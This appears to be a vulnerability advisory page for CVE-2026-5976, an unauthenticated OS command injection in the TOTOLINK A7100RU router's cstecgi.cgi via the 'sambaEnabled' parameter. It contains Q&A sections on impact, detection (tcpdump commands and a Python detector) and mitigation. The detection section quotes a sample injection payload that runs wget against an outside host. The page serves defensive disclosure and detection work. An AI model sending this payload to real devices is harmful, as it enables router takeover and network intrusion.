CVE-2026-5976
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-09
Last updated on: 2026-04-09
Assigner: VulDB
Description
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5976 is a command injection vulnerability in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI script cstecgi.cgi, specifically in the function that processes the 'sambaEnabled' parameter. This parameter is improperly handled and passed to a system command execution function, allowing an attacker to inject and execute arbitrary operating system commands remotely.
An attacker can exploit this by sending a specially crafted HTTP POST request to the router's /cgi-bin/cstecgi.cgi endpoint with a payload that includes malicious commands in the 'sambaEnabled' parameter. For example, commands like 'wget' can be executed on the router, demonstrating the ability to run arbitrary commands.
How can this vulnerability impact me?
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication. This can lead to full compromise of the router, including unauthorized access, control over network traffic, installation of malware, or use of the device as a pivot point for further attacks within the network.
Because the exploit is publicly available, attackers can easily leverage this flaw to compromise vulnerable devices, potentially leading to data breaches, network disruptions, or loss of privacy.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unusual HTTP POST requests to the /cgi-bin/cstecgi.cgi endpoint, specifically those containing the topicurl parameter set to "setStorageCfg" and the sambaEnabled parameter containing suspicious command injection payloads.
A practical detection method is to capture and inspect network traffic for POST requests with payloads similar to: {"topicurl":"setStorageCfg","sambaEnabled":"`wget 192.168.6.1:7777/testpoc`"}.
You can use tools like tcpdump or Wireshark to capture traffic, and grep or similar text search tools to find suspicious payloads.
Example command to capture HTTP POST requests to the vulnerable CGI script:
- tcpdump -l -n -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'POST /cgi-bin/cstecgi.cgi'
After capturing, search for suspicious sambaEnabled parameters containing backticks or command injection patterns.
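The check described above can be automated once request bodies have been reassembled from a capture or proxy log. The following is an added example, not code from the vendor or from this page's source; it assumes JSON request bodies like the one quoted above and assumes that a legitimate sambaEnabled value is a single 0 or 1. The sample requests are constructed for the demonstration.

```python
import json
import re

ENDPOINT = "/cgi-bin/cstecgi.cgi"
# Characters a shell interprets; a plain on/off setting never needs them.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\n]")
# Assumption (not stated on the page): the legitimate value is "0" or "1".
EXPECTED_VALUE = re.compile(r"[01]")

def inspect_request(raw: bytes) -> list:
    """Return findings for one raw HTTP request; an empty list means not flagged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")
    if len(parts) < 2 or parts[0].upper() != "POST":
        return []
    if parts[1].split("?", 1)[0] != ENDPOINT:
        return []
    try:
        data = json.loads(body.decode("utf-8", "replace"))
    except ValueError:
        # Malformed JSON that still names the parameter deserves a look.
        return ["unparseable body mentioning sambaEnabled"] if b"sambaEnabled" in body else []
    if (not isinstance(data, dict) or data.get("topicurl") != "setStorageCfg"
            or "sambaEnabled" not in data):
        return []
    value = str(data["sambaEnabled"])
    if SHELL_META.search(value):
        return ["shell metacharacter in sambaEnabled: %r" % value]
    if not EXPECTED_VALUE.fullmatch(value):
        return ["unexpected sambaEnabled value: %r" % value]
    return []

def build_request(body: str) -> bytes:
    """Build a constructed sample request (192.0.2.1 is a documentation address)."""
    return ("POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.0.2.1\r\n"
            "Content-Type: application/json\r\nContent-Length: %d\r\n\r\n%s"
            % (len(body), body)).encode()

# Constructed samples: a benign setting, the payload quoted on this page,
# and a request with a placeholder topic that should be ignored.
SAMPLES = {
    "benign": build_request('{"topicurl":"setStorageCfg","sambaEnabled":"1"}'),
    "page_payload": build_request(
        '{"topicurl":"setStorageCfg","sambaEnabled":"`wget 192.168.6.1:7777/testpoc`"}'),
    "other_topic": build_request('{"topicurl":"exampleOtherTopic"}'),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw))
```

The allowlist check catches values that carry no obvious metacharacter but still do not look like a simple setting, which a pattern search for backticks alone would miss.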
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable CGI endpoint /cgi-bin/cstecgi.cgi to trusted networks only, such as by firewall rules or access control lists.
Disable or block remote access to the TOTOLINK A7100RU router's management interface from untrusted networks.
Monitor and block suspicious HTTP POST requests containing the sambaEnabled parameter with unusual characters or command injection patterns.
If possible, update the router firmware to a version that patches this vulnerability or contact the vendor for a security update.
Until a patch is available, consider isolating the device from the internet or untrusted networks to prevent remote exploitation.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The CVE-2026-5976 vulnerability allows remote attackers to execute arbitrary operating system commands on the TOTOLINK A7100RU router due to improper input handling in the cstecgi.cgi script. This kind of vulnerability can lead to unauthorized access, data breaches, and potential compromise of sensitive information.
Such security flaws can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require organizations to protect personal and sensitive data from unauthorized access and ensure the integrity and confidentiality of their systems.
If exploited, this vulnerability could result in data exposure or system compromise, thereby violating requirements for data protection, incident response, and risk management mandated by these regulations.